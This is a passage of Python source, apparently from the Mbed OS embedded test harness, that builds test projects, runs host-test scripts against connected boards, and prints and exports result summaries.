test.source_dir, join(build_dir, test_id), T,
toolchain, test.dependencies, clean=clean_project_options,
name=project_name, macros=MACROS,
inc_dirs=INC_DIRS, jobs=self.opts_jobs, report=build_report,
properties=build_properties, project_id=test_id,
project_description=test.get_description(),
build_profile=profile, stats_depth=stats_depth,
notify=TerminalNotifier(),
)
except Exception as e:
project_name_str = project_name if project_name is not None else test_id
test_result = self.TEST_RESULT_FAIL
if isinstance(e, ToolException):
print(self.logger.log_line(
self.logger.LogType.ERROR,
'There were errors while building project %s' %
project_name_str))
test_result = self.TEST_RESULT_BUILD_FAILED
elif isinstance(e, NotSupportedException):
print(self.logger.log_line(
self.logger.LogType.INFO,
'Project %s is not supported' % project_name_str))
test_result = self.TEST_RESULT_NOT_SUPPORTED
# Append test results to global test summary
self.test_summary.append(
(test_result, target, toolchain, test_id,
test.get_description(), 0, 0, '-')
)
# Add detailed test result to test summary structure
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
self.test_summary_ext[target][toolchain][test_id].append({ 0: {
'result' : test_result,
'output' : '',
'target_name' : target,
'target_name_unique': target,
'toolchain_name' : toolchain,
'id' : test_id,
'description' : test.get_description(),
'elapsed_time' : 0,
'duration' : 0,
'copy_method' : None
}})
continue
if self.opts_only_build_tests:
# With this option we are skipping testing phase
continue
# Test duration can be increased by global value
test_duration = test.duration
if self.opts_extend_test_timeout is not None:
test_duration += self.opts_extend_test_timeout
# For an automated test the duration act as a timeout after
# which the test gets interrupted
test_spec = self.shape_test_request(target, path, test_id, test_duration)
test_loops = self.get_test_loop_count(test_id)
test_suite_properties['test.duration.%s.%s.%s'% (target, toolchain, test_id)] = test_duration
test_suite_properties['test.loops.%s.%s.%s'% (target, toolchain, test_id)] = test_loops
test_suite_properties['test.path.%s.%s.%s'% (target, toolchain, test_id)] = path
# read MUTs, test specification and perform tests
handle_results = self.handle(test_spec, target, toolchain, test_loops=test_loops)
if handle_results is None:
continue
for handle_result in handle_results:
if handle_result:
single_test_result, detailed_test_results = handle_result
else:
continue
# Append test results to global test summary
if single_test_result is not None:
self.test_summary.append(single_test_result)
# Add detailed test result to test summary structure
if target not in self.test_summary_ext[target][toolchain]:
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
append_test_result = detailed_test_results
# If waterfall and consolidate-waterfall options are enabled,
# only include the last test result in the report.
if self.opts_waterfall_test and self.opts_consolidate_waterfall_test:
append_test_result = {0: detailed_test_results[len(detailed_test_results) - 1]}
self.test_summary_ext[target][toolchain][test_id].append(append_test_result)
test_suite_properties['skipped'] = ', '.join(test_suite_properties['skipped'])
self.test_suite_properties_ext[target][toolchain] = test_suite_properties
q.put(target + '_'.join(toolchains))
return
def execute(self):
clean = self.test_spec.get('clean', False)
test_ids = self.test_spec.get('test_ids', [])
q = Queue()
# Generate seed for shuffle if seed is not provided in
self.shuffle_random_seed = round(random.random(), self.SHUFFLE_SEED_ROUND)
if self.opts_shuffle_test_seed is not None and self.is_shuffle_seed_float():
self.shuffle_random_seed = round(float(self.opts_shuffle_test_seed), self.SHUFFLE_SEED_ROUND)
if self.opts_parallel_test_exec:
###################################################################
# Experimental, parallel test execution per singletest instance.
###################################################################
execute_threads = [] # Threads used to build mbed SDL, libs, test cases and execute tests
# Note: We are building here in parallel for each target separately!
# So we are not building the same thing multiple times and compilers
# in separate threads do not collide.
# Inside execute_thread_slice() function function handle() will be called to
# get information about available MUTs (per target).
for target, toolchains in self.test_spec['targets'].items():
self.test_suite_properties_ext[target] = {}
t = threading.Thread(target=self.execute_thread_slice, args = (q, target, toolchains, clean, test_ids, self.build_report, self.build_properties))
t.daemon = True
t.start()
execute_threads.append(t)
for t in execute_threads:
q.get() # t.join() would block some threads because we should not wait in any order for thread end
else:
# Serialized (not parallel) test execution
for target, toolchains in self.test_spec['targets'].items():
if target not in self.test_suite_properties_ext:
self.test_suite_properties_ext[target] = {}
self.execute_thread_slice(q, target, toolchains, clean, test_ids, self.build_report, self.build_properties)
q.get()
return self.test_summary, self.shuffle_random_seed, self.test_summary_ext, self.test_suite_properties_ext, self.build_report, self.build_properties
def get_valid_tests(self, test_map_keys, target, toolchain, test_ids, include_non_automated):
valid_test_map_keys = []
for test_id in test_map_keys:
test = TEST_MAP[test_id]
if self.opts_test_by_names and test_id not in self.opts_test_by_names:
continue
if test_ids and test_id not in test_ids:
continue
if self.opts_test_only_peripheral and not test.peripherals:
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Common test skipped for target %s' % target))
continue
if (self.opts_peripheral_by_names and test.peripherals and
not any((i in self.opts_peripheral_by_names)
for i in test.peripherals)):
# We will skip tests not forced with -p option
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Common test skipped for target %s' % target))
continue
if self.opts_test_only_common and test.peripherals:
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Peripheral test skipped for target %s' % target))
continue
if not include_non_automated and not test.automated:
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Non automated test skipped for target %s' % target))
continue
if test.is_supported(target, toolchain):
if test.peripherals is None and self.opts_only_build_tests:
# When users are using 'build only flag' and test do not have
# specified peripherals we can allow test building by default
pass
elif self.opts_peripheral_by_names and test_id not in self.opts_peripheral_by_names:
# If we force peripheral with option -p we expect test
# to pass even if peripheral is not in MUTs file.
pass
elif not self.is_peripherals_available(target, test.peripherals):
if self.opts_verbose_skipped_tests:
if test.peripherals:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Peripheral %s test skipped for target %s' %
(",".join(test.peripherals), target)))
else:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Test %s skipped for target %s' %
(test_id, target)))
continue
# The test has made it through all the filters, so add it to the valid tests list
valid_test_map_keys.append(test_id)
return valid_test_map_keys
def get_skipped_tests(self, all_test_map_keys, valid_test_map_keys):
# NOTE: This will not preserve order
return list(set(all_test_map_keys) - set(valid_test_map_keys))
def generate_test_summary_by_target(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows text x toolchain test result matrix
"""
RESULT_INDEX = 0
TARGET_INDEX = 1
TOOLCHAIN_INDEX = 2
TEST_INDEX = 3
DESC_INDEX = 4
unique_targets = get_unique_value_from_summary(test_summary, TARGET_INDEX)
unique_tests = get_unique_value_from_summary(test_summary, TEST_INDEX)
unique_test_desc = get_unique_value_from_summary_ext(test_summary, TEST_INDEX, DESC_INDEX)
unique_toolchains = get_unique_value_from_summary(test_summary, TOOLCHAIN_INDEX)
result = "Test summary:\n"
for target in unique_targets:
result_dict = {} # test : { toolchain : result }
unique_target_toolchains = []
for test in test_summary:
if test[TARGET_INDEX] == target:
if test[TOOLCHAIN_INDEX] not in unique_target_toolchains:
unique_target_toolchains.append(test[TOOLCHAIN_INDEX])
if test[TEST_INDEX] not in result_dict:
result_dict[test[TEST_INDEX]] = {}
result_dict[test[TEST_INDEX]][test[TOOLCHAIN_INDEX]] = test[RESULT_INDEX]
pt_cols = ["Target", "Test ID", "Test Description"] + unique_target_toolchains
pt = PrettyTable(pt_cols, junction_char="|", hrules=HEADER)
for col in pt_cols:
pt.align[col] = "l"
pt.padding_width = 1 # One space between column edges and contents (default)
for test in unique_tests:
if test in result_dict:
test_results = result_dict[test]
if test in unique_test_desc:
row = [target, test, unique_test_desc[test]]
for toolchain in unique_toolchains:
if toolchain in test_results:
row.append(test_results[toolchain])
pt.add_row(row)
result += pt.get_string()
shuffle_seed_text = "Shuffle Seed: %.*f"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def generate_test_summary(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows target x test results matrix across
"""
success_code = 0 # Success code that can be leter returned to
result = "Test summary:\n"
# Pretty table package is used to print results
pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
"Elapsed Time (sec)", "Timeout (sec)", "Loops"], junction_char="|", hrules=HEADER)
pt.align["Result"] = "l" # Left align
pt.align["Target"] = "l" # Left align
pt.align["Toolchain"] = "l" # Left align
pt.align["Test ID"] = "l" # Left align
pt.align["Test Description"] = "l" # Left align
pt.padding_width = 1 # One space between column edges and contents (default)
result_dict = {self.TEST_RESULT_OK : 0,
self.TEST_RESULT_FAIL : 0,
self.TEST_RESULT_ERROR : 0,
self.TEST_RESULT_UNDEF : 0,
self.TEST_RESULT_IOERR_COPY : 0,
self.TEST_RESULT_IOERR_DISK : 0,
self.TEST_RESULT_IOERR_SERIAL : 0,
self.TEST_RESULT_NO_IMAGE : 0,
self.TEST_RESULT_TIMEOUT : 0,
self.TEST_RESULT_MBED_ASSERT : 0,
self.TEST_RESULT_BUILD_FAILED : 0,
self.TEST_RESULT_NOT_SUPPORTED : 0
}
for test in test_summary:
if test[0] in result_dict:
result_dict[test[0]] += 1
pt.add_row(test)
result += pt.get_string()
result += "\n"
# Print result count
result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.items()])
shuffle_seed_text = "Shuffle Seed: %.*f\n"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def test_loop_list_to_dict(self, test_loops_str):
""" Transforms test_id=X,test_id=X,test_id=X into dictionary {test_id : test_id_loops_count}
"""
result = {}
if test_loops_str:
test_loops = test_loops_str
for test_loop in test_loops:
test_loop_count = test_loop.split('=')
if len(test_loop_count) == 2:
_test_id, _test_loops = test_loop_count
try:
_test_loops = int(_test_loops)
except:
continue
result[_test_id] = _test_loops
return result
def get_test_loop_count(self, test_id):
""" This function returns no. of loops per test (deducted by test_id_.
If test is not in list of redefined loop counts it will use default value.
"""
result = self.GLOBAL_LOOPS_COUNT
if test_id in self.TEST_LOOPS_DICT:
result = self.TEST_LOOPS_DICT[test_id]
return result
def delete_file(self, file_path):
""" Remove file from the system
"""
result = True
resutl_msg = ""
try:
os.remove(file_path)
except Exception as e:
resutl_msg = e
result = False
return result, resutl_msg
def handle_mut(self, mut, data, target_name, toolchain_name, test_loops=1):
""" Test is being invoked for given MUT.
"""
# Get test information, image and test timeout
test_id = data['test_id']
test = TEST_MAP[test_id]
test_description = TEST_MAP[test_id].get_description()
image = data["image"]
duration = data.get("duration", 10)
if mut is None:
print("Error: No Mbed available: MUT[%s]" % data['mcu'])
return None
mcu = mut['mcu']
copy_method = mut.get('copy_method') # Available board configuration selection e.g. core selection etc.
selected_copy_method = self.opts_copy_method if copy_method is None else copy_method
# Tests can be looped so test results must be stored for the same test
test_all_result = []
# Test results for one test ran few times
detailed_test_results = {} # { Loop_number: { results ... } }
for test_index in range(test_loops):
# If mbedls is available and we are auto detecting MUT info,
# update MUT info (mounting may changed)
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
platform_name_filter = [mcu]
muts_list = {}
found = False
for i in range(0, 60):
print('Looking for %s with MBEDLS' % mcu)
muts_list = get_autodetected_MUTS_list(platform_name_filter=platform_name_filter)
if 1 not in muts_list:
sleep(3)
else:
found = True
break
if not found:
print("Error: mbed not found with MBEDLS: %s" % data['mcu'])
return None
else:
mut = muts_list[1]
disk = mut.get('disk')
port = mut.get('port')
if disk is None or port is None:
return None
target_by_mcu = TARGET_MAP[mut['mcu']]
target_name_unique = mut['mcu_unique'] if 'mcu_unique' in mut else mut['mcu']
# Some extra stuff can be declared in MUTs structure
reset_type = mut.get('reset_type') # reboot.txt, reset.txt, shutdown.txt
reset_tout = mut.get('reset_tout') # COPY_IMAGE -> RESET_PROC -> SLEEP(RESET_TOUT)
# When the build and test system were separate, this was relative to a
# base network folder base path: join(NETWORK_BASE_PATH, ).
# "image" is now a list representing a development image and an update image
# (for device management). When testing, we only use the development image.
image_path = image[0]
# Host test execution
start_host_exec_time = time()
single_test_result = self.TEST_RESULT_UNDEF # single test run result
_copy_method = selected_copy_method
if not exists(image_path):
single_test_result = self.TEST_RESULT_NO_IMAGE
elapsed_time = 0
single_test_output = self.logger.log_line(self.logger.LogType.ERROR, 'Image file does not exist: %s'% image_path)
print(single_test_output)
else:
# Host test execution
start_host_exec_time = time()
host_test_verbose = self.opts_verbose_test_result_only or self.opts_verbose
host_test_reset = self.opts_mut_reset_type if reset_type is None else reset_type
host_test_result = self.run_host_test(test.host_test,
image_path, disk, port, duration,
micro=target_name,
verbose=host_test_verbose,
reset=host_test_reset,
reset_tout=reset_tout,
copy_method=selected_copy_method,
program_cycle_s=target_by_mcu.program_cycle_s)
single_test_result, single_test_output, single_testduration, single_timeout = host_test_result
# Store test result
test_all_result.append(single_test_result)
total_elapsed_time = time() - start_host_exec_time # Test time with copy (flashing) / reset
elapsed_time = single_testduration # TIme of single test case execution after reset
detailed_test_results[test_index] = {
'result' : single_test_result,
'output' : single_test_output,
'target_name' : target_name,
'target_name_unique' : target_name_unique,
'toolchain_name' : toolchain_name,
'id' : test_id,
'description' : test_description,
'elapsed_time' : round(elapsed_time, 2),
'duration' : single_timeout,
'copy_method' : _copy_method,
}
print(self.print_test_result(
single_test_result, target_name_unique, toolchain_name, test_id,
test_description, elapsed_time, single_timeout))
# If we perform waterfall test we test until we get OK and we stop testing
if self.opts_waterfall_test and single_test_result == self.TEST_RESULT_OK:
break
return (self.shape_global_test_loop_result(test_all_result, self.opts_waterfall_test and self.opts_consolidate_waterfall_test),
target_name_unique,
toolchain_name,
test_id,
test_description,
round(elapsed_time, 2),
single_timeout,
self.shape_test_loop_ok_result_count(test_all_result)), detailed_test_results
def handle(self, test_spec, target_name, toolchain_name, test_loops=1):
""" Function determines MUT's mbed disk/port and copies binary to
target.
"""
handle_results = []
data = json.loads(test_spec)
# Find a suitable MUT:
mut = None
for id, m in self.muts.items():
if m['mcu'] == data['mcu']:
mut = m
handle_result = self.handle_mut(mut, data, target_name, toolchain_name, test_loops=test_loops)
handle_results.append(handle_result)
return handle_results
def print_test_result(self, test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, duration):
""" Use specific convention to print test result and related data
"""
tokens = []
tokens.append("TargetTest")
tokens.append(target_name)
tokens.append(toolchain_name)
tokens.append(test_id)
tokens.append(test_description)
separator = "::"
time_info = " in %.2f of %d sec" % (round(elapsed_time, 2), duration)
result = separator.join(tokens) + " [" + test_result +"]" + time_info
return Fore.MAGENTA + result + Fore.RESET
def shape_test_loop_ok_result_count(self, test_all_result):
""" Reformats list of results to simple string
"""
test_loop_count = len(test_all_result)
test_loop_ok_result = test_all_result.count(self.TEST_RESULT_OK)
return "%d/%d"% (test_loop_ok_result, test_loop_count)
def shape_global_test_loop_result(self, test_all_result, waterfall_and_consolidate):
""" Reformats list of results to simple string
"""
result = self.TEST_RESULT_FAIL
if all(test_all_result[0] == res for res in test_all_result):
result = test_all_result[0]
elif waterfall_and_consolidate and any(res == self.TEST_RESULT_OK for res in test_all_result):
result = self.TEST_RESULT_OK
return result
def run_host_test(self, name, image_path, disk, port, duration,
micro=None, reset=None, reset_tout=None,
verbose=False, copy_method=None, program_cycle_s=None):
""" Function creates new process with host test configured with particular test case.
Function also is pooling for serial port activity from process to catch all data
printed by test runner and host test during test execution
"""
def get_char_from_queue(obs):
""" Get character from queue safe way
"""
try:
c = obs.queue.get(block=True, timeout=0.5)
except Empty:
c = None
return c
def filter_queue_char(c):
""" Filters out non ASCII characters from serial port
"""
if ord(c) not in range(128):
c = ' '
return c
def get_test_result(output):
""" Parse test 'output' data
"""
result = self.TEST_RESULT_TIMEOUT
for line in "".join(output).splitlines():
search_result = self.RE_DETECT_TESTCASE_RESULT.search(line)
if search_result and len(search_result.groups()):
result = self.TEST_RESULT_MAPPING[search_result.groups(0)[0]]
break
return result
def get_auto_property_value(property_name, line):
""" Scans auto detection line from MUT and returns scanned parameter 'property_name'
Returns string
"""
result = None
if re.search("HOST: Property '%s'"% property_name, line) is not None:
property = re.search("HOST: Property '%s' = '([\w\d _]+)'"% property_name, line)
if property is not None and len(property.groups()) == 1:
result = property.groups()[0]
return result
cmd = ["python",
'%s.py'% name,
'-d', disk,
'-f', '"%s"'% image_path,
'-p', port,
'-t', str(duration),
'-C', str(program_cycle_s)]
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
cmd += ['--auto']
# Add extra parameters to host_test
if copy_method is not None:
cmd += ["-c", copy_method]
if micro is not None:
cmd += ["-m", micro]
if reset is not None:
cmd += ["-r", reset]
if reset_tout is not None:
cmd += ["-R", str(reset_tout)]
if verbose:
print(Fore.MAGENTA + "Executing '" + " ".join(cmd) + "'" + Fore.RESET)
print("Test::Output::Start")
proc = Popen(cmd, stdout=PIPE, cwd=HOST_TESTS)
obs = ProcessObserver(proc)
update_once_flag = {} # Stores flags checking if some auto-parameter was already set
line = ''
output = []
start_time = time()
while (time() - start_time) < (2 * duration):
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
# Give the mbed under test a way to communicate the end of the test
if c in ['\n', '\r']:
# Checking for auto-detection information from the test about MUT reset moment
if 'reset_target' not in update_once_flag and "HOST: Reset target..." in line:
# We will update this marker only once to prevent multiple time resets
update_once_flag['reset_target'] = True
start_time = time()
# Checking for auto-detection information from the test about timeout
auto_timeout_val = get_auto_property_value('timeout', line)
if 'timeout' not in update_once_flag and auto_timeout_val is not None:
# We will update this marker only once to prevent multiple time resets
update_once_flag['timeout'] = True
duration = int(auto_timeout_val)
# Detect mbed assert:
if 'mbed assertation failed: ' in line:
output.append('{{mbed_assert}}')
break
# Check for test end
if '{end}' in line:
break
line = ''
else:
line += c
end_time = time()
testcase_duration = end_time - start_time # Test case duration from reset to {end}
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
if verbose:
print("Test::Output::Finish")
# Stop test process
obs.stop()
result = get_test_result(output)
return (result, "".join(output), testcase_duration, duration)
def is_peripherals_available(self, target_mcu_name, peripherals=None):
""" Checks if specified target should run specific peripheral test case defined in MUTs file
"""
if peripherals is not None:
peripherals = set(peripherals)
for id, mut in self.muts.items():
# Target MCU name check
if mut["mcu"] != target_mcu_name:
continue
# Peripherals check
if peripherals is not None:
if 'peripherals' not in mut:
continue
if not peripherals.issubset(set(mut['peripherals'])):
continue
return True
return False
def shape_test_request(self, mcu, image_path, test_id, duration=10):
""" Function prepares JSON structure describing test specification
"""
test_spec = {
"mcu": mcu,
"image": image_path,
"duration": duration,
"test_id": test_id,
}
return json.dumps(test_spec)
def get_unique_value_from_summary(test_summary, index):
""" Gets list of unique target names
"""
result = []
for test in test_summary:
target_name = test[index]
if target_name not in result:
result.append(target_name)
return sorted(result)
def get_unique_value_from_summary_ext(test_summary, index_key, index_val):
""" Gets list of unique target names and return dictionary
"""
result = {}
for test in test_summary:
key = test[index_key]
val = test[index_val]
if key not in result:
result[key] = val
return result
def show_json_file_format_error(json_spec_filename, line, column):
""" Prints JSON broken content
"""
with open(json_spec_filename) as data_file:
line_no = 1
for json_line in data_file:
if line_no + 5 >= line: # Print last few lines before error
print('Line %d:\t'%line_no + json_line)
if line_no == line:
print('%s\t%s^' (' ' * len('Line %d:' % line_no),
'-' * (column - 1)))
break
line_no += 1
def json_format_error_defect_pos(json_error_msg):
""" Gets first error line and column in JSON file format.
Parsed from exception thrown by json.loads() string
"""
result = None
line, column = 0, 0
# Line value search
line_search = re.search('line [0-9]+', json_error_msg)
if line_search is not None:
ls = line_search.group().split(' ')
if len(ls) == 2:
line = int(ls[1])
# Column position search
column_search = re.search('column [0-9]+', json_error_msg)
if column_search is not None:
cs = column_search.group().split(' ')
if len(cs) == 2:
column = int(cs[1])
result = [line, column]
return result
def get_json_data_from_file(json_spec_filename, verbose=False):
""" Loads from file JSON formatted string to data structure
"""
result = None
try:
with open(json_spec_filename) as data_file:
try:
result = json.load(data_file)
except ValueError as json_error_msg:
result = None
print('JSON file %s parsing failed. Reason: %s' %
(json_spec_filename, json_error_msg))
# We can print where error occurred inside JSON file if we can parse exception msg
json_format_defect_pos = json_format_error_defect_pos(str(json_error_msg))
if json_format_defect_pos is not None:
line = json_format_defect_pos[0]
column = json_format_defect_pos[1]
print()
show_json_file_format_error(json_spec_filename, line, column)
except IOError as fileopen_error_msg:
print('JSON file %s not opened. Reason: %s\n'%
(json_spec_filename, fileopen_error_msg))
if verbose and result:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(result)
return result
def print_muts_configuration_from_json(json_data, join_delim=", ", platform_filter=None):
""" Prints MUTs configuration passed to test script for verboseness
"""
muts_info_cols = []
# We need to check all unique properties for each defined MUT
for k in json_data:
mut_info = json_data[k]
for mut_property in mut_info:
if mut_property not in muts_info_cols:
muts_info_cols.append(mut_property)
# Prepare pretty table object to display all MUTs
pt_cols = ["index"] + muts_info_cols
pt = PrettyTable(pt_cols, junction_char="|", hrules=HEADER)
for col in pt_cols:
pt.align[col] = "l"
# Add rows to pretty print object
for k in json_data:
row = [k]
mut_info = json_data[k]
add_row = True
if platform_filter and 'mcu' in mut_info:
add_row = re.search(platform_filter, mut_info['mcu']) is not None
if add_row:
for col in muts_info_cols:
cell_val = mut_info[col] if col in mut_info else None
if isinstance(cell_val, list):
cell_val = join_delim.join(cell_val)
row.append(cell_val)
pt.add_row(row)
return pt.get_string()
def print_test_configuration_from_json(json_data, join_delim=", "):
""" Prints test specification configuration passed to test script for verboseness
"""
toolchains_info_cols = []
# We need to check all toolchains for each device
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
toolchains = targets[target]
for toolchain in toolchains:
if toolchain not in toolchains_info_cols:
toolchains_info_cols.append(toolchain)
# Prepare pretty table object to display test specification
pt_cols = ["mcu"] + sorted(toolchains_info_cols)
pt = PrettyTable(pt_cols, junction_char="|", hrules=HEADER)
for col in pt_cols:
pt.align[col] = "l"
# { target : [conflicted toolchains] }
toolchain_conflicts = {}
toolchain_path_conflicts = []
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
target_supported_toolchains = get_target_supported_toolchains(target)
if not target_supported_toolchains:
target_supported_toolchains = []
target_name = target if target in TARGET_MAP else "%s*"% target
row = [target_name]
toolchains = targets[target]
for toolchain in sorted(toolchains_info_cols):
# Check for conflicts: target vs toolchain
conflict = False
conflict_path = False
if toolchain in toolchains:
if toolchain not in target_supported_toolchains:
conflict = True
if target not in toolchain_conflicts:
toolchain_conflicts[target] = []
toolchain_conflicts[target].append(toolchain)
# Add marker inside table about target usage / conflict
cell_val = 'Yes' if toolchain in toolchains else '-'
if conflict:
cell_val += '*'
# Check for conflicts: toolchain vs toolchain path
if toolchain in TOOLCHAIN_PATHS:
toolchain_path = TOOLCHAIN_PATHS[toolchain]
if not os.path.isdir(toolchain_path):
conflict_path = True
if toolchain not in toolchain_path_conflicts:
toolchain_path_conflicts.append(toolchain)
if conflict_path:
cell_val += '#'
row.append(cell_val)
pt.add_row(row)
# generate result string
result = pt.get_string() # Test specification table
if toolchain_conflicts or toolchain_path_conflicts:
result += "\n"
result += "Toolchain conflicts:\n"
for target in toolchain_conflicts:
if target not in TARGET_MAP:
result += "\t* Target %s unknown\n"% (target)
conflict_target_list = join_delim.join(toolchain_conflicts[target])
sufix = 's' if len(toolchain_conflicts[target]) > 1 else ''
result += "\t* Target %s does not support %s toolchain%s\n"% (target, conflict_target_list, sufix)
for toolchain in toolchain_path_conflicts:
# Let's check toolchain configuration
if toolchain in TOOLCHAIN_PATHS:
toolchain_path = TOOLCHAIN_PATHS[toolchain]
if not os.path.isdir(toolchain_path):
result += "\t# Toolchain %s path not found: %s\n"% (toolchain, toolchain_path)
return result
def get_avail_tests_summary_table(cols=None, result_summary=True, join_delim=',',platform_filter=None):
""" Generates table summary with all test cases and additional test cases
information using pretty print functionality. Allows test suite user to
see test cases
"""
# get all unique test ID prefixes
unique_test_id = []
for test in TESTS:
split = test['id'].split('_')[:-1]
test_id_prefix = '_'.join(split)
if test_id_prefix not in unique_test_id:
unique_test_id.append(test_id_prefix)
unique_test_id.sort()
counter_dict_test_id_types = dict((t, 0) for t in unique_test_id)
counter_dict_test_id_types_all = dict((t, 0) for t in unique_test_id)
test_properties = ['id',
'automated',
'description',
'peripherals',
'host_test',
'duration'] if cols is None else cols
# All tests status table print
pt = PrettyTable(test_properties, junction_char="|", hrules=HEADER)
for col in test_properties:
pt.align[col] = "l"
pt.align['duration'] = "r"
counter_all = 0
counter_automated = 0
pt.padding_width = 1 # One space between column edges and contents (default)
for test_id in sorted(TEST_MAP.keys()):
if platform_filter is not None:
# FIlter out platforms using regex
if re.search(platform_filter, test_id) is None:
continue
row = []
test = TEST_MAP[test_id]
split = test_id.split('_')[:-1]
test_id_prefix = '_'.join(split)
for col in test_properties:
col_value = test[col]
if isinstance(test[col], list):
col_value = join_delim.join(test[col])
elif test[col] == None:
col_value = "-"
row.append(col_value)
if test['automated'] == True:
counter_dict_test_id_types[test_id_prefix] += 1
counter_automated += 1
pt.add_row(row)
# Update counters
counter_all += 1
counter_dict_test_id_types_all[test_id_prefix] += 1
result = pt.get_string()
result += "\n\n"
if result_summary and not platform_filter:
# Automation result summary
test_id_cols = ['automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols, junction_char="|", hrules=HEADER)
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
percent_progress = round(100.0 * counter_automated / float(counter_all), 1)
str_progress = progress_bar(percent_progress, 75)
pt.add_row([counter_automated, counter_all, percent_progress, str_progress])
result += "Automation coverage:\n"
result += pt.get_string()
result += "\n\n"
# Test automation coverage table print
test_id_cols = ['id', 'automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols, junction_char="|", hrules=HEADER)
pt.align['id'] = "l"
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
for unique_id in unique_test_id:
# print "\t\t%s: %d / %d" % (unique_id, counter_dict_test_id_types[unique_id], counter_dict_test_id_types_all[unique_id])
percent_progress = round(100.0 * counter_dict_test_id_types[unique_id] / float(counter_dict_test_id_types_all[unique_id]), 1)
str_progress = progress_bar(percent_progress, 75)
row = [unique_id,
counter_dict_test_id_types[unique_id],
counter_dict_test_id_types_all[unique_id],
percent_progress,
"[" + str_progress + "]"]
pt.add_row(row)
result += "Test automation coverage:\n"
result += pt.get_string()
result += "\n\n"
return result
def progress_bar(percent_progress, saturation=0):
""" This function creates progress bar with optional simple saturation mark
"""
step = percent_progress // 2 # Scale by to (scale: 1 - 50)
str_progress = '#' * step + '.' * int(50 - step)
c = '!' if str_progress[38] == '.' else '|'
if saturation > 0:
saturation = saturation // 2
str_progress = str_progress[:saturation] + c + str_progress[saturation:]
return str_progress
def singletest_in_cli_mode(single_test):
""" Runs SingleTestRunner object in CLI (Command line interface) mode
@return returns success code (0 == success) for building and running tests
"""
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext, build_report, build_properties = single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print(single_test.generate_test_summary(test_summary, shuffle_seed))
if single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print(single_test.generate_test_summary_by_target(test_summary,
shuffle_seed))
print("Completed in %.2f sec" % elapsed_time)
# Write summary of the builds
print_report_exporter = ReportExporter(ResultExporterType.PRINT, package="build")
status = print_report_exporter.report(build_report)
# Store extra reports in files
if single_test.opts_report_html_file_name:
# Export results in form of HTML report to separate file
report_exporter = ReportExporter(ResultExporterType.HTML)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_html_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_junit_file_name:
# Export results in form of JUnit XML report to separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_junit_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_text_file_name:
# Export results in form of a text file
report_exporter = ReportExporter(ResultExporterType.TEXT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_text_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_build_file_name:
# Export build results as html report to sparate file
report_exporter = ReportExporter(ResultExporterType.JUNIT, package="build")
report_exporter.report_to_file(build_report, single_test.opts_report_build_file_name, test_suite_properties=build_properties)
# Returns True if no build failures of the test projects or their dependencies
return status
class TestLogger(object):
""" Super-class for logging and printing ongoing events for test suite pass
"""
def __init__(self, store_log=True):
""" We can control if logger actually stores log in memory
or just handled all log entries immediately
"""
self.log = []
self.log_to_file = False
self.log_file_name = None
self.store_log = store_log
self.LogType = construct_enum(INFO='Info',
WARN='Warning',
NOTIF='Notification',
ERROR='Error',
EXCEPT='Exception')
self.LogToFileAttr = construct_enum(CREATE=1, # Create or overwrite existing log file
APPEND=2) # Append to existing log file
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Log one line of text
"""
log_timestamp = time()
log_entry = {'log_type' : LogType,
'log_timestamp' : log_timestamp,
'log_line' : log_line,
'_future' : None
}
# Store log in memory
if self.store_log:
self.log.append(log_entry)
return log_entry
class CLITestLogger(TestLogger):
""" Logger used with CLI (Command line interface) test suite. Logs on screen and to file if needed
"""
def __init__(self, store_log=True, file_name=None):
TestLogger.__init__(self)
self.log_file_name = file_name
#self.TIMESTAMP_FORMAT = '%y-%m-%d %H:%M:%S' # Full date and time
self.TIMESTAMP_FORMAT = '%H:%M:%S' # Time only
